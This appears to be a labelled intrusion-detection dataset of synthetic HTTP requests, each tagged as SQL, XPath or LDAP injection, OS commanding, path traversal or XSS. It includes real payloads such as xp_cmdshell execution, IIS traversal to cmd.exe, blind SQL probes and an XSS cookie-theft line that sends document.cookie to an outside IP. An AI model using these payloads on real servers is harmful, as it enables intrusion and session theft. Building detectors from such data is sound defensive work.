GET /anetretXlHy/vJpH-@hwbZN/esahjyhe6Bavtof4wot/hQrKzLXmX.mspx?rl55aHy=45&neeO=insertnluafndropsi0&tMqxe=93&8nhes3esyw=wMpFg7iaAwAN&vds=Ietae&pnerc=32534&zheymey=htw5etlaSinc&gZUYF_UKC=i%5Cod6eRraEag&aeehoWhEY=2openaeiin%3FHcerstyleobl%28+B&Otr1wra=ev1&db8m=%2Bd1%5CeeMJl&7iframeJEsgutmpF=n4eotnns3&sintyeoemba=rtsg%2B&s4ea13rorrenic=ot%26n%3Dcmdrdocument HTTP/1.0
Host: www.xcnehlolF.net
Connection: close
Accept: application/*;q=0.4, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: bEe' or     bad/otillu/child::node()[processing-instruction()=60]   or 'oc7nn'  =   '
Accept-Language: 8673  or  1<  Nnao/ser/hkH1u/child::text()[position()=883] or 00='] | /* | /foo[bar='
Cache-Control: max-age=5909
Client-ip: 188.64.206.7
Cookie2: $Version="9"
Date: Fri, 02 Jul 04 14:13:30 UTC
ETag: W/"R3jwvlpSyvKD@X3"
Expect: dqa6O
If-Modified-Since: Sat, 12 Feb 05 08:14:23 GMT
If-Range: Wed, 26 May 04 06:37:44 GMT
Pragma: Shnuzai='gonhTns'
Referer: http://caeas.st/viieeM/vamj.gif
TE: trailers,chunked;q=0.9
User-Agent: moothtbtmd/6.5.7
UA-Disp: 373,940,32
Transfer-Encoding: compress
Upgrade: sth/0.2

null

End - Id: 48374
Start - Id: 42591
class: SqlInjection
GET /eS.y2X3/iformUELn/dRlnECzoZXfWt/hyFV_egLV0qKXtD/sVX8mD6-HoLuelluFzD/s4iqnt/hzrHNx6-xm72eV4k/g@SL-/heeeboistn/9st6tscAFts5i.pl?6ard=execnqrA&oehkefai0jst=618&PiX7FXhaform=ac%7CT&azmae2zoeqI=83&iHeae2os=5aTsMo1&oe2BatXTcfj=%3B+exec++get_cust%28+%27x%27%27+union+++select++++object_name%2Cobject_type%2C%27%27x%27%27+++from++user_objects+++++where+%27%27aeseoad91s%27%27+%3D+%27%27+%27++%29%3B&rokaam9ew=e1vH&ab=t5jG0&a4ie=civa&JcWQ2servicesexec=tTaymrcpeegaTef HTTP/1.1
Host: 169.28.207.122
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.7, windows-1258, koi8-r, big5
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 2.110.69.195
Cookie: nsot=8QO;x@Rx=7uaWeonhaecanag;Oo6du-JcN=89530984;l4bsnnafare=350;moasiOh4I=sfaIxd7saseaa
Cookie2: $Version="502"
Date: Thu, 15 May 08 17:06:50 UTC
ETag: "htxw_uK4_0z1HSarAA"
Expect: siHyt5
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 29 Jan 07 18:12:32 GMT
If-Unmodified-Since: Wed, 24 Oct 07 16:56:11 CET
If-Match: "U.eTCu-t1pQUGgMn"
If-None-Match: "iJyGF_NfrY_XWd4M8Y"
If-Range: ".i0RC-BNWzZKkalv"
Max-Forwards: 2767
MIME-Version: 1.0
Pragma: 92Ee='uulea'
Proxy-Authorization: Basic YXJ0MTpkaVNiYW4=
Authorization: Basic ZWF0aTplbDlybXQ=
Range: 5-,-2176,0697-71705
Referer: http://pw4Aweu.biz/qbqzf.mdb
TE: trailers,chunked;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/2.4 (X11; U; Linux i586 3.2; te-m2; rv:2.5.6) Gecko/46410952
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.8 www.aed2Nnsl.jpg, 5.2 152.201.56.54
Transfer-Encoding: srsy
Upgrade: r8az/4.5, ShnfKa/1.6, Ne8h/2.3, uo3m/9.4, baps/3.8
Warning: 765 www.ningpa.jpg "haujs3gtxtukti7rmtti" "Wed, 08 Aug 07 04:54:20 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 89713741
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42591
Start - Id: 41098
class: SqlInjection
GET /KuZLcSG/hetstnSwot0a/vetc.exe?IglarDm7la=ecopy2%3Fh&reeGoega=%3Dtj&edtnnhnt8dUs9nn=n%3AametaZ&UzAocRxterm0nlink=zsttmstp3trsYieo&e8hknen=1169773&selnme=ahx&ietOe=e+&d81Z8=rXm%40AmW&DIdn6cSotgiswrn=62134417&isy8dbli=doaraoh&dfigsr6ouIor=exec+++++xp_cmdshell+++%27%22rd7ug5le%22+++++%3E%3E++++script.vbs%27&tch=zle0+cmdsNmuioyrt&qrf0S=0834&oceir4rsee9r=the HTTP/1.1
Host: 136.131.223.255
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-alej, Tt4tfg9-eceseer;q=0.5
Cache-Control: min-fresh=4
Client-ip: 26.15.87.96
Cookie: seepe4Ejene=snGdswds\window.openrsterfn:;H8tCeAPer=cepassthruq oxtermml)cd: r$forms;uTiOpuaarta=u;sg35sO=0tdxt;1mail0vSlibservicesuEMYchild=ksfbn
Cookie2: $Version="397"
Date: Fri, 15 Oct 04 20:20:59 UTC
ETag: "LCyAUTv1NDlcy2-tThpH"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 02 Apr 04 16:35:36 UTC
If-Unmodified-Since: Thu, 08 May 08 24:15:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest opaque="sqsll"
Authorization: nedle 4l5o=4osg
Range: 1-877
Referer: http://her0simp.gov/nsQh/eglgYy/uwmsjri/veoohayR.swf
TE: chunked;q=0.1,trailers,trailers
Trailer: User-Agent
User-Agent: Aleohoe
UA-CPU: PowerPC
UA-Disp: 926,7799,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: proa2
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41098
Start - Id: 37739
class: LdapInjection
GET /Haccess_log.5Nv2DQformG-i/yg/tsyoe9AtadHoieksr/wMnaxulnbeaUidS3y/gdsc7tnurut7beac2uth.cgi?mwsino9ioee=7&PRkwgetXC=17168703&8rtoAhote4=bgsoundtn6&uoeeshfaeiyIn=bs+whereq&mmfeyn=%29+++%28++%7C++%28displayName%3Dhad*%29++%28name+++%3D++++had*+++%29%28mail%3Dhad*+%29 HTTP/1.1
Host: 216.150.147.231
Connection: haiteos
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.0, deflate;q=0.8, compress;q=0.3, compress
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 176.160.67.197
Cookie: ioirui=0t
Cookie2: $Version="7"
Date: Sat, 03 Apr 04 11:55:59 UTC
ETag: "O7n8cheml6sy0-OowP8"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Tue, 21 Nov 06 21:50:08 UTC
If-Unmodified-Since: Wed, 17 Oct 07 07:07:52 UTC
If-Match: "TB38GRc90FRtspy"
If-None-Match: *
If-Range: Sun, 08 Aug 04 08:00:26 UTC
Max-Forwards: 7901
Pragma: pa='5b'
Authorization: Digest uri=http://www.iocewM.gov/Rinu4/dgoSehz/iei6hap/ndwygij.mspx
Range: 79793-4
Referer: http://tltxc.gov/teus/rbCus.shtml
Trailer: Date
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 1.5; 8t-ti; rv:6.6.1) Gecko/60105428
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
UA-Color: color32
Via: FTP/6.8 www.zlsotas.html:692, 8.5 228.187.118.220, 1.5 www.Irncenet.png:9697
Transfer-Encoding: eeehNs; derft=eep3tnt
Upgrade: ttg/0.7, pnio/2.7
Warning: 066 www.c4unOT.css:8455 "feehe" "Wed, 23 Jan 08 03:29:39 GMT"
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37739
Start - Id: 48795
class: XPathInjection
GET /2gTYH-Z/NnSdnTiar1rv/n2MxJU8387MR/eN8uomw4W/eom/ttrxrwle/m_asw9EO5MXNGa/ixtrde/eNokd3dsd/tynhGeuhTyee7e/d3@.Df88.swf?h1dyed=hwj%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+%27jm3b0IOs%27++%3D++++%27&eodduG3N=hetnto%5Dldivet%3C HTTP/1.0
Host: 195.120.111.213:80
Connection: roleooWn
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: sseislhj-m5Sih
Cache-Control: max-stale
Client-ip: 208.70.172.168
Cookie: i1ius=f0aderpsaiv4;ShtaccespY-p=mn;oio=ni;rb6roeoEh=9;co44t=tdbaltY+j;ehltftohaa=69
Cookie2: $Version="75"
Date: Thu, 08 Mar 07 06:47:20 GMT
ETag: W/"gTz@WD@id8M7yzIPzc"
Expect: 100-continue
From: rokltsth@ewew.uk
If-Modified-Since: Sun, 05 Aug 07 10:19:33 UTC
If-Unmodified-Since: Thu, 30 Oct 08 12:50:32 GMT
If-Match: "jG.f3nc1sD9gKE9oKd."
If-None-Match: "PfGO7I.73rfKKJ8yUGfZ"
If-Range: *
Max-Forwards: 1879
MIME-Version: 7.6
Pragma: aidoo='9Utgrr2e'
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: NTLM Z1NzbHJOYTZpazFlZ2hlcmFlcWFpa3I1YWVzaW1zV3JjcnNzb3JldE1jOA==
Range: -2670
Referer: /oree/6stna.doc
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/9.3 (Windows; U; Windows NT 3.4; 8h-1a; rv:9.8.9) Gecko/95385348
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x396
Via: HTTP/2.1 www.tsttIrr.htm, 2.7 113.189.150.76
Transfer-Encoding: compress
Upgrade: zT3/4.9, hrK1te/0.3, iIQppa/8.1, uhVyt/5.1
Warning: 435 www.dsxS.html:99 "eing" "Thu, 16 Jun 05 09:56:23 CET"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48795
Start - Id: 44528
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.j64r.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: koi8;q=0.3, windows-1252
Accept-Encoding: *;q=0.9
Accept-Language: oETh-1
Cache-Control: min-fresh=06
Cookie: occhecsmCeeEe=ct@qN@7W@56P;VHAS-usr=hqao3hbtDtLuts;ppseedi=o6i;dcddgriiiestce=cGIt88rI5;QxWBb.=m 
Date: Mon, 28 Nov 05 08:58:15 CET
ETag: W/"pik_981fbQAX0z-QQeD"
Expect: rhea
If-None-Match: *
If-Range: Wed, 03 Nov 04 07:02:32 GMT
Max-Forwards: 01
Pragma: no-cache
Authorization: Digest response="208F600d95D2dDe4DB8BB5BaA6EEC86a"
Referer: http://0ram9.uk/orees/fiAn/sdoulrz.asmx
TE: trailers
User-Agent: Mozilla/5.9 (compatible; Konqueror/1.8; Linux i386; iroaimd; usya; elnnah)
UA-Disp: 681,3359,16
Via: 5.7 www.aqldp2tu.tiff:56674, 2.8 203.217.240.173
Transfer-Encoding: compress

null

End - Id: 44528
Start - Id: 42733
class: SqlInjection
PUT /uA8D5kLkfromV5EZu/bEclri/Zdeletev98sock_streamFbwS88NN/eY/t@JRLRznsj7lqagjB/ehlfee/mvSNlTuomJL1C/oUMp@grsI/ef0isneenv7r/mT5zD.shtml? HTTP/1.0
Content-Length: 200
Content-Language: 9a,ieideed
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 21:11:45 UTC
Host: www.TlowrmeIn.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: AND   ascii(lower(substring((SELECT    TOP   1     oA7   FROM sysobject    WHERE    xtype    =  'U'   ),1,1)))   >  111
Client-ip: 42.53.182.41
Cookie2: $Version="93"
Date: Sun, 17 Oct 04 04:35:27 UTC
ETag: "@xUBxoEhoc4aPgO7g11_"
Expect: henoceNd=8nsfey9;na1r=9uePttty
If-Modified-Since: Thu, 17 Dec 09 04:46:31 GMT
If-Match: *
Max-Forwards: 985
Referer: http://9eeie.biz/Inqn/arnsarf/04un4ha.png
User-Agent: SpoEhmsmie (oCvUjqdk; liTNq-pw; tL7Xj_)
UA-OS: Win9x

eaarlnhe=wbF  Stfhat&dpl=nlr&i4bw0Deys07trxr=1&qo0oiemelrHi=8&14Noaisaaehnaeu=T etcne Tt;:e=]s&reKformd.ARIZ=la2h3&nsoemNkltibcr=(aro&C180d-PU=1281991&rael=0Lgr&UneUtadvs=t40r&selhhl6=yozPjI

End - Id: 42733
Start - Id: 44342
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.hnac5.org:3
Connection: tschtr
Accept: */*
Accept-Charset: x-mac-japanese, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 195.143.138.197
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="89"
Date: Wed, 02 May 07 10:31:15 GMT
ETag: "kwXTvO@4m-@MIi_"
Expect: 100-continue
From: Q0IEeur@zgehtbi59.uk
If-Modified-Since: Thu, 12 Jul 07 17:27:36 CET
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: *
If-Range: Fri, 09 Mar 07 22:55:02 UTC
Max-Forwards: 3100
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: a9cb rpta8oc=nteya
Range: -4,7986-,046-946045
Referer: /omroir/owRN/atede5to/P0en.aspx
TE: gzip;q=0.9,trailers,deflate;q=0.5
Trailer: Max-Forwards
User-Agent: iyu7hgW http://www.eLaiv.cz
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: FTP/3.5 www.nzode.gif, FTP/8.8 6.128.212.140:7478
Transfer-Encoding: deflate
Upgrade: ecbon/5.1, 0dstft/4.6, rh6g/9.8
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44342
Start - Id: 49833
class: XPathInjection
GET /n@B7hMN@rR98DOhK5/OKpwOxe8nph-5Nqp/pad6xI/Tobhtn1e/iB3q0vptE0X4z0k/ffrcUweweeu/tt0nBLpnnlY/ua5N.tiff?Yehu8tatPDiey=1787+++or++1%3C++ci%2Fala4%2FopshsA%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+++or+988%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&xnntxi3eqgls=7UrQ5b82kZl&ral=lsdsusrE&bareQ2me=doRuGQmyNv&OsoDe5oaaeTon=3296&haTse=98101&7tesxDs=56368&29ioFei=0aeza4eT25f HTTP/1.0
Host: www.tyirahnu.biz
Connection: atsi
Accept: */*
Accept-Charset: iso-8859-8, koi8-r;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 77.69.248.51
Cookie: kJOall=u shliurlaeelcd
Cookie2: $Version="7"
Date: Tue, 01 Jan 08 19:54:07 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: sgt9Obf=4tdadt
From: noamdhg@Dea3h8.biz
If-Modified-Since: Sun, 04 Apr 10 16:47:53 CET
If-Unmodified-Since: Tue, 15 Aug 06 24:14:26 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 10 07:25:47 GMT
Max-Forwards: 831
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -16,498057-,69-3
Referer: /c9lon/Fab6wntt.asmx
TE: trailers
Trailer: Accept
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 5.2; ei-tf; rv:6.4.8) Gecko/99588313
UA-CPU: Sparc
UA-Disp: 662,518,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: 9.4 www.minkmp.jpeg, FTP/3.6 246.63.114.250, 9.9 www.ehTlne.css
Transfer-Encoding: deflate
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49833
Start - Id: 46491
class: XSS
GET /<SCRIPT>/? HTTP/1.1
Host: 210.225.146.38
Connection: close
Accept: image/*, image/jpeg, text/plain;q=0.6
Accept-Charset: utf-7;q=0.3, iso-8859-4;q=0.0, iso-8859-6, iso-8859-2;q=0.5, cp-936
Accept-Encoding: gzip
Accept-Language: ma-Andm
Cache-Control: no-store
Client-ip: 137.78.176.107
Cookie: daYr5owIor=937466424;dQTfbde=88;icen=u5qBq;cbecx= 'sbtaC%u/ddhome2aiinscriptw;gi8=hd7eis6oddfnmro
Cookie2: $Version="5"
Date: Tue, 03 Jan 06 03:38:52 UTC
ETag: "XgEaHknSpO0avcsEQ"
Expect: 5rctCi08
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Wed, 04 Mar 09 08:17:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Feb 07 09:32:05 UTC
Max-Forwards: 2234
Pragma: no-cache
Proxy-Authorization: NTLM cnZJb2h4dWxrb0VENnBOMW9menRPT3NvaTdlc3J0aXd2ZUlvYnRuZXRlbw==
Authorization: ruoE 6op1hEgU=ttrsS
Range: 0-48
Referer: /o343em/nmrdeaa/tierm/ctiaa/aahom.wav
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.7 (compatible; h8AeCeemao; SunOS sun4u; cn7wiaom; eyewbSpmny)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 616 www.HiVsl3ns.js "wiis9esdak" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 46491
Start - Id: 46709
class: XSS
GET /9PqZeeSLmLLcb14/8odtiisdm5o/4ruoslaenishsae/hGEgs9p_6PZAd0MQFX/Qz5.jpeg?uirtasEin=962&edEinht=liadmindl HTTP/1.1
Host: www.atpo.uk
Connection: ijTiior
Accept: */*;q=0.7
Accept-Charset: windows-1258, utf-8, iso-8859-6;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 83.155.194.175
Cookie: neaaehtssv6=<input   type    =    "image   "    dynsrc    ="  javascript:  [window.open('http://6.185.148.92/nisili.asmx'+document.cookie);]    " >
Cookie2: $Version="86"
Date: Thu, 09 Dec 04 09:00:19 GMT
ETag: W/"dHuhPq5WqZM4Uf@F7uMX"
Expect: 100-continue
If-Modified-Since: Mon, 01 May 06 01:01:14 GMT
If-Unmodified-Since: Fri, 02 Oct 09 09:25:08 UTC
If-Match: "T2QT0lgHLGY@Tc_Vwr"
If-None-Match: "-nTeGdJa7xM4E6c"
If-Range: Thu, 25 Nov 04 05:11:55 CET
Max-Forwards: 31
MIME-Version: 6.9
Pragma: x=ee
Proxy-Authorization: Basic ZVNyajp3dHJjdWVlaA==
Authorization: dcbarr YtiugSac=unrmhn
Range: 67-,32476-,9656-
Referer: http://www.kcTj.gov/rutofII/veup/Imhai8ai/3sgafvu.php3
TE: trailers,deflate;q=0.1,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (X11; U; SunOS sun4u 1.0; Ew-nt; rv:8.5.5) Gecko/35696066
UA-Disp: 2459,269,16
UA-Pixels: 461x6638
Via: 0.6 www.ec1dslr.gif, 5.1 www.Zeiq.html:691, FTP/6.7 240.226.223.177
Upgrade: hie/8.8, noj0il/3.1
X-Forwarded-For: 40.45.63.28
X-Serial-Number: 96347754197329
----: ------------------------------------------------

null

End - Id: 46709
Start - Id: 48996
class: XPathInjection
GET /ttreaqw8.dll?f8PS0dCWjSP=pi0%2F9rcn%2Fdu1%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D174%5D+%7C+++7Desre%2F7uo%2Fckzes%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D443%5D+++++or++%27m8M%27%3D++++%27 HTTP/1.0
Host: 134.77.99.142
Connection: as6ttNel
Accept: audio/*;q=0.1, application/x-tar, video/*;q=0.6
Accept-Charset: iso-2022-kr, iso-8859-6, windows-1254;q=0.0, x-mac-cyrillic;q=0.6, iso-2022-jp;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 22.128.202.196
Cookie: s1elcsr=4
Cookie2: $Version="494"
Date: Mon, 06 Apr 09 15:44:09 CET
ETag: W/"-.OXjC_5aOfFkoC9vZ07"
Expect: 100-continue
From: yriAeeon@iwtteeent.st
If-Modified-Since: Tue, 25 Dec 07 20:50:49 UTC
If-Unmodified-Since: Sat, 01 Aug 09 13:21:54 UTC
If-Match: "IzwC84_hhPeqhlgrf1"
If-None-Match: "uofVswyLoU8o568OmhzM"
If-Range: *
Max-Forwards: 0158
MIME-Version: 9.9
Pragma: dnll='tle'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: NTLM bmU2b2lzeXM3QXR0ZHkzaWxmbnUyM09hcmlvYW43dElubmRJcnA=
Range: 07-,82077-88,93-23160
Referer: http://www.daunrbTu.st/c9ae5lra/Llnzljzr/ducr/eyoa/geltgI.mdb
TE: deflate;q=0.9
Trailer: Range
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 5.2; td-sd; rv:1.7.2) Gecko/10637510
UA-CPU: 68000
UA-Disp: 3103,4052,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 146x384
Via: HTTP/2.4 www.eBblsOit.html:0
Transfer-Encoding: compress
Upgrade: ooldn/4.6, Lt8g/4.6, eeaos/4.4, en1qst/7.3, omia/8.0
Warning: 563 234.105.17.162 "anhi3" "Tue, 17 Nov 09 08:19:31 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48996
Start - Id: 45726
class: PathTransversal
GET /m82sReCousFcEet2/tscjeu/txYZ/x1fa9VWmY@P91.png?nhqill=wMyUg1&husi1i=+ldGnen&erohabfhhan=6&EAeanepIej=e+%29reneEpbgsoundesin%3C&nahlhrr=T%5D%3Azdnnao8eria%5D&cMawball9d-8=3386612&S8umnrR0rei=yaplb5td&lndtepnuLiogao=70868871&pdhne9entee3o5=..........................WINNTsystem.ini&K4@6OA0LGNwC=nc9xieaa+k%27ukF%3Cte%5Ci2&ioaT1sidgn=SieeDpdtEewrdiht1&mppN=87&oclrsa=1%40Gyp&xe2aqSbtD=o++fromautoexec HTTP/1.1
Host: 63.136.226.239:80
Connection: Uqeu0at
Accept: video/*;q=0.9, image/*, audio/basic;q=0.7
Accept-Charset: iso-8859-9;q=0.4, iso-8859-6;q=0.0, euc-kr
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 19.222.68.7
Cookie: Eosc=oaraeibtt53;asSael46pih=is4oyeodfpttelStir;hgyht3EF=m;9nr=r ;aiy=894310
Cookie2: $Version="66"
Date: Sun, 11 Nov 07 19:03:04 CET
ETag: W/"6TA0sUBIpgg4.xGcl"
Expect: rSosIh9e=a8hwy3h;f2oa3tw=ntAp
From: reani1tb@daeireeubl.de
If-Modified-Since: Tue, 28 Feb 06 15:23:55 CET
If-Unmodified-Since: Fri, 28 Dec 07 20:53:53 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: /etoe/tl5d3n/ehbnsfsr/tctUcrp.sh
TE: chunked;q=0.2,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 7.6; ec-ji; rv:9.7.4) Gecko/33456600
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9995x4195
Via: 7.2 www.bnulth.jpeg, 5.4 www.Aae7ma.jpg
Transfer-Encoding: identity
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45726
Start - Id: 44221
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 140.236.224.153
Connection: close
Accept: application/postscript, application/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: o1nlr-a, j-caddDi
Cache-Control: min-fresh=9009
Client-ip: 227.197.106.185
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="572"
Date: Tue, 02 Mar 04 23:22:05 CET
ETag: W/"rXMGHgqjxj.t68uw@Vdp"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Fri, 20 Mar 09 03:34:05 UTC
If-Match: "I98u.lUEzS7m4zgrri"
If-None-Match: "SXp9m8A9eXa9yfR"
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: NTLM TW90b2V6UGVzbzRlbjR0a2xnamluZWJlaWVpeXNwNWFnZWlkcw==
Range: 09660-850419
Referer: http://4kiTsk.uk/ebhtuAru/mraeaa/tuaj2uS.doc
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.0 (compatible; Konqueror/9.1; WinNT; deoaiUuarq; uaGjsrea)
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.3 www.apL7ee.shtml:97, 8.2 www.suDis.shtml
Transfer-Encoding: eioon; ioTauWiM=aiit3ka
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44221
Start - Id: 35142
class: SqlInjection
PUT /vNeYwpsoDgP0_0.pC/0hfqSCP/4KuvdwarxIr6@y5q/wzj4.ILoO/YZ/sVwr5HluYcEyT3qyQWU/r6a0gOs@MqGQq4r/coc3XCtk2I9/rekri.css? HTTP/1.0
Content-Length: 234
Content-Language: ia6
Content-Encoding: compress
Content-Location: http://www.ekb1Rw.be/hesoc/dmnol/Iptn/3eiw3aen.asp
Content-MD5: ZGRkcm9lZ2RqendodWNlVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 09:06:50 UTC
Last-Modified: Thu, 06 Oct 05 07:14:22 GMT
Host: www.tetowcie.net
Connection: sRoi
Accept: audio/basic;q=0.5, text/*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: min-fresh=961
Client-ip: 104.27.173.11
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="374"
Date: Mon, 04 Jul 05 01:45:25 CET
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Mon, 12 Dec 05 09:48:43 UTC
If-Match: *
If-None-Match: "xAeDUQ3e7hTvFHvOCvd"
If-Range: Tue, 22 Jun 04 10:44:19 UTC
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM bGFlM0hpYnN0Ymlkb3AzaDFlb2lvZnVjcm5Tbmxyc2FoYTZkbQ==
Range: 63-383,700-,-5
Referer: http://www.ehysqat.it/9Nrs.php3
TE: trailers
